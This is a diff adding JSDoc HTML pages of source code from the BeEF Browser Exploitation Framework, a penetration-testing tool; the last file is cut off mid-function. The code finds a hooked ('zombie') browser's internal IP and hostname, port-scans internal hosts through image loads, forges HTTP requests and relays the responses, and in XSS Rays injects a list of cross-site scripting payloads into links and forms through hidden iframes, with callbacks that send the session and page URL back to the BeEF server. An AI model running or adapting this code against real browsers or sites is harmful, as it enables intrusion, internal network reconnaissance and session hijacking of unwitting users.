<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>

138
docs/net_local.js.html Normal file
View File

@@ -0,0 +1,138 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: net/local.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: net/local.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* Provides networking functions for the local/internal network of the zombie.
* @namespace beef.net.local
*/
beef.net.local = {
sock: false,
checkJava: false,
hasJava: false,
/**
* Initializes the java socket. We have to use this method because
* some browsers do not have java installed or it is not accessible.
* in which case creating a socket directly generates an error. So this code
* is invalid:
* sock: new java.net.Socket();
*/
initializeSocket: function() {
if(this.checkJava){
if(!beef.browser.hasJava()) {
this.checkJava=True;
this.hasJava=False;
return -1;
}else{
this.checkJava=True;
this.hasJava=True;
return 1;
}
}
else{
if(!this.hasJava) return -1;
else{
try {
this.sock = new java.net.Socket();
} catch(e) {
return -1;
}
return 1;
}
}
},
/**
* Returns the internal IP address of the zombie.
* @return {String} the internal ip of the zombie.
* @error return -1 if the internal ip cannot be retrieved.
*/
getLocalAddress: function() {
if(!this.hasJava) return false;
this.initializeSocket();
try {
this.sock.bind(new java.net.InetSocketAddress('0.0.0.0', 0));
this.sock.connect(new java.net.InetSocketAddress(document.domain, (!document.location.port)?80:document.location.port));
return this.sock.getLocalAddress().getHostAddress();
} catch(e) { return false; }
},
/**
* Returns the internal hostname of the zombie.
* @return {String} the internal hostname of the zombie.
* @error return -1 if the hostname cannot be retrieved.
*/
getLocalHostname: function() {
if(!this.hasJava) return false;
this.initializeSocket();
try {
this.sock.bind(new java.net.InetSocketAddress('0.0.0.0', 0));
this.sock.connect(new java.net.InetSocketAddress(document.domain, (!document.location.port)?80:document.location.port));
return this.sock.getLocalAddress().getHostName();
} catch(e) { return false; }
}
};
beef.regCmp('beef.net.local');
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>

117
docs/net_portscanner.js.html Normal file
View File

@@ -0,0 +1,117 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: net/portscanner.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: net/portscanner.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* Provides port scanning functions for the zombie. A mod of pdp's scanner
*
* Version: '0.1',
* author: 'Petko Petkov',
* homepage: 'http://www.gnucitizen.org'
* @namespace beef.net.portscanner
*/
beef.net.portscanner = {
/**
*
* @param callback
* @param target
* @param port
* @param timeout
*/
scanPort: function(callback, target, port, timeout)
{
var timeout = (timeout == null)?100:timeout;
var img = new Image();
img.onerror = function () {
if (!img) return;
img = undefined;
callback(target, port, 'open');
};
img.onload = img.onerror;
img.src = 'http://' + target + ':' + port;
setTimeout(function () {
if (!img) return;
img = undefined;
callback(target, port, 'closed');
}, timeout);
},
/**
*
* @param callback
* @param target
* @param ports_str
* @param timeout
*/
scanTarget: function(callback, target, ports_str, timeout)
{
var ports = ports_str.split(",");
for (index = 0; index &lt; ports.length; index++) {
this.scanPort(callback, target, ports[index], timeout);
};
}
};
beef.regCmp('beef.net.portscanner');
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>

92
docs/net_requester.js.html Normal file
View File

@@ -0,0 +1,92 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: net/requester.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: net/requester.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* request object structure:
* + method: {String} HTTP method to use (GET or POST).
* + host: {String} hostname
* + query_string: {String} The query string is a part of the URL which is passed to the program.
* + uri: {String} The URI syntax consists of a URI scheme name.
* + headers: {Array} contain the operating parameters of the HTTP request.
* @namespace beef.net.requester
*/
beef.net.requester = {
handler: "requester",
/**
*
* @param {array} requests_array
*/
send: function(requests_array) {
for(var i=0; i&lt;requests_array.length; i++){
request = requests_array[i];
if (request.proto == 'https') var scheme = 'https'; else var scheme = 'http';
beef.debug('[Requester] ' + request.method + ' ' + scheme + '://' + request.host + ':' + request.port + request.uri + ' - Data: ' + request.data);
beef.net.forge_request(scheme, request.method, request.host, request.port, request.uri, null, request.headers, request.data, 10, null, request.allowCrossDomain, request.id,
function(res, requestid) { beef.net.send('/requester', requestid, {
response_data: res.response_body,
response_status_code: res.status_code,
response_status_text: res.status_text,
response_port_status: res.port_status,
response_headers: res.headers});
}
);
}
}
};
beef.regCmp('beef.net.requester');
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>

550
docs/net_xssrays.js.html Normal file
View File

@@ -0,0 +1,550 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: net/xssrays.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: net/xssrays.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>/*
* XSS Rays
* Legal bit:
* Do not remove this notice.
* Copyright (c) 2009 by Gareth Heyes
* Programmed for Microsoft
* gareth --at-- businessinfo -dot- co |dot| uk
* Version 0.5.5
*
* This license governs use of the accompanying software. If you use the software, you
* accept this license. If you do not accept the license, do not use the software.
* 1. Definitions
* The terms "reproduce," "reproduction," "derivative works," and "distribution" have the
* same meaning here as under U.S. copyright law.
* A "contribution" is the original software, or any additions or changes to the software.
* A "contributor" is any person that distributes its contribution under this license.
* "Licensed patents" are a contributor's patent claims that read directly on its contribution.
* 2. Grant of Rights
* (A) Copyright Grant- Subject to the terms of this license, including the license conditions and limitations in section 3, each contributor grants you a non-exclusive, worldwide, royalty-free copyright license to reproduce its contribution, prepare derivative works of its contribution, and distribute its contribution or any derivative works that you create.
* (B) Patent Grant- Subject to the terms of this license, including the license conditions and limitations in section 3, each contributor grants you a non-exclusive, worldwide, royalty-free license under its licensed patents to make, have made, use, sell, offer for sale, import, and/or otherwise dispose of its contribution in the software or derivative works of the contribution in the software.
* 3. Conditions and Limitations
* (A) No Trademark License- This license does not grant you rights to use any contributors' name, logo, or trademarks.
* (B) If you bring a patent claim against any contributor over patents that you claim are infringed by the software, your patent license from such contributor to the software ends automatically.
* (C) If you distribute any portion of the software, you must retain all copyright, patent, trademark, and attribution notices that are present in the software.
* (D) If you distribute any portion of the software in source code form, you may do so only under this license by including a complete copy of this license with your distribution. If you distribute any portion of the software in compiled or object code form, you may only do so under a license that complies with this license.
* (E) The software is licensed "as-is." You bear the risk of using it. The contributors give no express warranties, guarantees or conditions. You may have additional consumer rights under your local laws which this license cannot change. To the extent permitted under your local laws, the contributors exclude the implied warranties of merchantability, fitness for a particular purpose and non-infringement.
*/
/**
* XssRays 0.5.5 ported to BeEF by Michele "antisnatchor" Orru'
* The XSS detection mechanisms has been rewritten from scratch: instead of using the location hash trick (that doesn't work anymore),
* if the vulnerability is triggered the JS code vector will contact back BeEF.
* Other aspects of the original code have been simplified and improved.
* @namespace beef.net.xssrays
*/
beef.net.xssrays = {
handler: "xssrays",
completed:0,
totalConnections:0,
// BeEF variables
xssraysScanId : 0,
hookedBrowserSession: "",
beefRayUrl: "",
// the following variables are overridden via BeEF, in the Scan Config XssRays sub-tab.
crossDomain: false,
cleanUpTimeout:5000,
//browser-specific attack vectors available strings: ALL, FF, IE, S, C, O
vectors: [
{input:"\',XSS,\'", name: 'Standard DOM based injection single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'",XSS,"', name: 'Standard DOM based injection double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'\'">&lt;script>XSS&lt;\/script>', name: 'Standard script injection', browser: 'ALL',url:true,form:true,path:true},
{input:'\'">&lt;body onload="XSS">', name: 'body onload', browser: 'ALL',url:true,form:true,path:true},
{input:'%27%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%22%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%25%32%37%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%25%32%32%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%%32%35%%33%32%%33%32%%32%35%%33%33%%34%35%%32%35%%33%33%%34%33%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35XSS%%32%35%%33%33%%34%33%%32%35%%33%32%%34%36%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35', name: 'double nibble url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
{input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true},
{input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
{input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
{input:'\'\"&lt;\/script>&lt;\/xml>&lt;\/title>&lt;\/textarea>&lt;\/noscript>&lt;\/style>&lt;\/listing>&lt;\/xmp>&lt;\/pre>&lt;img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
{input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'"},XSS,function x(){//', name: 'DOM based function breaker double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3eXSS\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e', name: 'DOM based innerHTML injection', browser: 'ALL',url:true,form:true,path:true},
{input:'javascript:XSS', name: 'Javascript protocol injection', browser: 'ALL',url:true,form:true,path:true},
{input:'null,XSS//', name: 'Unfiltered DOM injection comma', browser: 'ALL',url:true,form:true,path:true},
{input:'null\nXSS//', name: 'Unfiltered DOM injection new line', browser: 'ALL',url:true,form:true,path:true}
],
uniqueID: 0,
rays: [],
stack: [],
/**
* return true is the attack vector can be launched to the current browser type.
* @param {array} vector_array_index
*/
checkBrowser:function(vector_array_index){
var result = false;
var browser_id = this.vectors[vector_array_index].browser;
switch (browser_id){
case "ALL":
result = true;
break;
case "FF":
if(beef.browser.isFF())result=true;
break;
case "IE":
if(beef.browser.isIE())result=true;
break;
case "C":
if(beef.browser.isC())result=true;
break;
case "S":
if(beef.browser.isS())result=true;
break;
case "O":
if(beef.browser.isO())result=true;
break;
default : result = false;
}
beef.debug("==== browser_id ==== [" + browser_id + "], result [" + result + "]");
return result;
},
/**
* main function, where all starts :-)
* @param xssraysScanId
* @param hookedBrowserSession
* @param beefUrl
* @param crossDomain
* @param timeout
*/
startScan:function(xssraysScanId, hookedBrowserSession, beefUrl, crossDomain, timeout) {
this.xssraysScanId = xssraysScanId;
this.hookedBrowserSession = hookedBrowserSession;
this.beefRayUrl = beefUrl + '/' + this.handler;
beef.debug("Using [" + this.beefRayUrl + "] handler to contact back BeEF");
this.crossDomain = crossDomain;
this.cleanUpTimeout = timeout;
this.scan();
beef.debug("Starting scan");
this.runJobs();
},
complete:function() {
if (beef.net.xssrays.completed == beef.net.xssrays.totalConnections) {
beef.debug("COMPLETE, notifying BeEF for scan id [" + beef.net.xssrays.xssraysScanId + "]");
$j.get(this.beefRayUrl, { hbsess: this.hookedBrowserSession, raysid: this.xssraysScanId, action: "finish"} );
} else {
this.getNextJob();
}
},
getNextJob:function() {
var that = this;
beef.debug("getNextJob - this.stack.length [" + this.stack.length + "]");
if (this.stack.length > 0) {
var func = that.stack.shift();
if (func) {
that.completed++;
func.call(that);
}
}else{ //nothing else to scan
this.complete();
}
},
scan:function() {
this.scanLinks();
this.scanForms();
},
scanPaths:function() {
this.xss({type:'path'});
return this;
},
scanForms: function() {
this.xss({type:'form'});
return this;
},
scanLinks: function() { //TODO: add depth crawling for links that are in the same domain
beef.debug("scanLinks, document.links.length [" + document.links.length + "]");
for (var i = 0; i &lt; document.links.length; i++) {
var url = document.links[i];
if ((url.hostname.toString() === location.hostname.toString() || this.crossDomain) &amp;&amp; (location.protocol === 'http:' || location.protocol === 'https:')) {
beef.debug("Starting scanning URL [" + url + "]\n url.href => " + url.href +
"\n url.pathname => " + url.pathname + "\n" +
"url.search => " + url.search + "\n");
this.xss({href:url.href, pathname:url.pathname, hostname:url.hostname, port: url.port, protocol: location.protocol,
search:url.search, type: 'url'});//scan each link &amp; param
} else {
beef.debug('Scan is not Cross-domain. URLS\nurl :' + url.hostname.toString());
beef.debug('\nlocation :' + location.hostname.toString());
}
}
if (location.search.length > 0) {
this.xss({pathname:location.pathname, hostname:url.hostname, port: url.port, protocol: location.protocol,search:location.search, type: 'url'});//scan originating url
}
return this;
},
xss:function(target) {
switch (target.type) {
case "url":
if (target.search.length > 0) {
target.search = target.search.slice(1);
target.search = target.search.split(/&amp;|&amp;amp;/);
if(beef.browser.isIE() &amp;&amp; target.pathname.charAt(0) != "/"){ //the damn IE doesn't contain the forward slash in pathname
var pathname = "/" + target.pathname;
}else{
var pathname = target.pathname;
}
var params = {};
for (var i = 0; i &lt; target.search.length; i++) {
target.search[i] = target.search[i].split('=');
params[target.search[i][0]] = target.search[i][1];
}
for (var i = 0; i &lt; this.vectors.length; i++) {
// skip the current vector if it's not compatible with the hooked browser
if (!this.checkBrowser(i)){
beef.debug("Skipping vector [" + this.vectors[i].name + "] because it's not compatible with the current browser.");
continue;
}
if (!this.vectors[i].url) {
continue;
}
if (this.vectors[i].url) {
if (target.port == null || target.port == "") {
beef.debug("Starting XSS on GET params of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + pathname + "]");
this.run(target.protocol + '//' + target.hostname + pathname, 'GET', this.vectors[i], params, true);//params
} else {
beef.debug("Starting XSS on GET params of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + ':' + target.port + pathname + "]");
this.run(target.protocol + '//' + target.hostname + ':' + target.port + pathname, 'GET', this.vectors[i], params, true);//params
}
}
if (this.vectors[i].path) {
if (target.port == null || target.port == "") {
beef.debug("Starting XSS on URI PATH of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + pathname + "]");
this.run(target.protocol + '//' + target.hostname + pathname, 'GET', this.vectors[i], null, true);//paths
} else {
beef.debug("Starting XSS on URI PATH of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + ':' + target.port + pathname + "]");
this.run(target.protocol + '//' + target.hostname + ':' + target.port + pathname, 'GET', this.vectors[i], null, true);//paths
}
}
}
}
break;
case "form":
var params = {};
var paramsstring = "";
for (var i = 0; i &lt; document.forms.length; i++) {
var action = document.forms[i].action || document.location;
var method = document.forms[i].method.toUpperCase() === 'POST' ?
'POST' :
'GET';
for (var j = 0; j &lt; document.forms[i].elements.length; j++) {
params[document.forms[i].elements[j].name] = document.forms[i].elements[j].value || 1;
}
for (var k = 0; k &lt; this.vectors.length; k++) {
// skip the current vector if it's not compatible with the hooked browser
if (!this.checkBrowser(k)){
beef.debug("Skipping vector [" + this.vectors[i].name + "] because it's not compatible with the current browser.");
continue;
}
if (!this.vectors[k].form) {
continue;
}
if (!this.crossDomain &amp;&amp; (this.host(action).toString() != this.host(location.toString()))) {
beef.debug('Scan is not Cross-domain. FormPost\naction :' + this.host(action).toString());
beef.debug('location :' + this.host(location));
continue;
}
if (this.vectors[k].form) {
if (method === 'GET') {
beef.debug("Starting XSS on FORM action params, GET method of [" + action + "], params [" + paramsstring + "]");
this.run(action, method, this.vectors[k], params, true);//params
}
else {
beef.debug("Starting XSS on FORM action params, POST method of [" + action + "], params [" + paramsstring + "]");
this.run(action, method, this.vectors[k], params, false);//params
}
}
if (this.vectors[k].path) {
beef.debug("Starting XSS on FORM action URI PATH of [" + action + "], ");
this.run(action, 'GET', this.vectors[k], null, true);//paths
}
}
}
break;
}
},
host: function(url) {
var host = url;
host = /^https?:[\/]{2}[^\/]+/.test(url.toString())
? url.toString().match(/^https?:[\/]{2}[^\/]+/)
: /(?:^[^a-zA-Z0-9\/]|^[a-zA-Z0-9]+[:]+)/.test(url.toString())
? ''
: location.hostname.toString();
return host;
},
fileName: function(url) {
return url.match(/(?:^[^\/]|^https?:[\/]{2}|^[\/]+)[^?]+/) || '';
},
urlEncode: function(str) {
str = str.toString();
str = str.replace(/"/g, '%22');
str = str.replace(/&amp;/g, '%26');
str = str.replace(/\+/g, '%2b');
return str;
},
/**
* this is the main core function with the detection mechanisms...
* @param url
* @param method
* @param vector
* @param params
* @param urlencode
*/
run: function(url, method, vector, params, urlencode) {
this.stack.push(function() {
//check if the URL end with / . In this case remove the last /, as it will be added later.
// this check is needed only when checking for URI path injections
if(url[url.length - 1] == "/" &amp;&amp; params == null){
url = url.substring(0, url.length - 2);
beef.debug("Remove last / from url. New url [" + url + "]");
}
beef.net.xssrays.uniqueID++;
beef.debug('Processing vector [' + vector.name + "], URL [" + url + "]");
var poc = '';
var pocurl = url;
var exploit = '';
var action = url;
beef.net.xssrays.rays[beef.net.xssrays.uniqueID] = {vector:vector,url:url,params:params};
var ray = this.rays[beef.net.xssrays.uniqueID];
var paramsPos = 0;
if (params != null) {
/*
* ++++++++++ check for XSS in URI parameters (GET) ++++++++++
*/
for (var i in params) {
if (params.hasOwnProperty(i)) {
if (!/[?]/.test(url)) {
url += '?';
pocurl += '?';
}
poc = vector.input.replace(/XSS/g, "alert(1)");
pocurl += i + '=' + (urlencode ? encodeURIComponent(poc) : poc) + '&amp;';
beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.poc = pocurl;
beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
beefCallback = "location='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&amp;raysid=" + this.xssraysScanId
+ "&amp;action=ray" + "&amp;p='+window.location.href+'&amp;n=" + ray.vector.name + "&amp;m=" + ray.vector.method + "'";
exploit = vector.input.replace(/XSS/g, beefCallback);
if(beef.browser.isC() || beef.browser.isS()){ //we will base64 the whole uri later
url += i + '=' + exploit + '&amp;';
}else{
url += i + '=' + (urlencode ? encodeURIComponent(exploit) : exploit) + '&amp;';
}
paramsPos++;
}
}
} else {
/*
* ++++++++++ check for XSS in URI path (GET) ++++++++++
*/
var filename = beef.net.xssrays.fileName(url);
poc = vector.input.replace(/XSS/g, "alert(1)");
pocurl = poc.replace(filename, filename + '/' + (urlencode ? encodeURIComponent(exploit) : exploit) + '/');
beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.poc = pocurl;
beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&amp;raysid=" + this.xssraysScanId
+ "&amp;action=ray" + "&amp;p='+window.location.href+'&amp;n=" + ray.vector.name + "&amp;m=" + ray.vector.method + "'";
exploit = vector.input.replace(/XSS/g, beefCallback);
//TODO: if the url is something like example.com/?param=1 then a second slash will be added, like example.com//&lt;xss>.
//TODO: this need to checked and the slash shouldn't be added in this particular case
url = url.replace(filename, filename + '/' + (urlencode ? encodeURIComponent(exploit) : exploit) + '/');
}
/*
* ++++++++++ create the iFrame that will contain the attack vector ++++++++++
*/
if(beef.browser.isIE()){
try {
var iframe = document.createElement('&lt;iframe name="ray'+Math.random().toString() +'">');
} catch (e) {
var iframe = document.createElement('iframe');
iframe.name = 'ray' + Math.random().toString();
}
}else{
var iframe = document.createElement('iframe');
iframe.name = 'ray' + Math.random().toString();
}
iframe.style.display = 'none';
iframe.id = 'ray' + beef.net.xssrays.uniqueID;
iframe.time = beef.net.xssrays.timestamp();
if (method === 'GET') {
if(beef.browser.isC() || beef.browser.isS()){
var datauri = btoa(url);
iframe.src = "data:text/html;base64," + datauri;
}else{
iframe.src = url;
}
document.body.appendChild(iframe);
beef.debug("Creating XSS iFrame with src [" + iframe.src + "], id[" + iframe.id + "], time [" + iframe.time + "]");
} else if (method === 'POST') {
/*
* ++++++++++ check for XSS in body parameters (POST) ++++++++++
*/
var form = '&lt;form action="' + beef.net.xssrays.escape(action) + '" method="post" id="frm">';
poc = '';
pocurl = action + "?";
paramsPos = 0;
beef.debug("Form action [" + action + "]");
for (var i in params) {
if (params.hasOwnProperty(i)) {
poc = vector.input.replace(/XSS/g, "alert(1)");
poc = poc.replace(/&lt;\/script>/g, "&lt;\/scr\"+\"ipt>");
pocurl += i + '=' + (urlencode ? encodeURIComponent(poc) : poc); // + '&amp;';
beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.poc = pocurl;
beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&amp;raysid=" + this.xssraysScanId
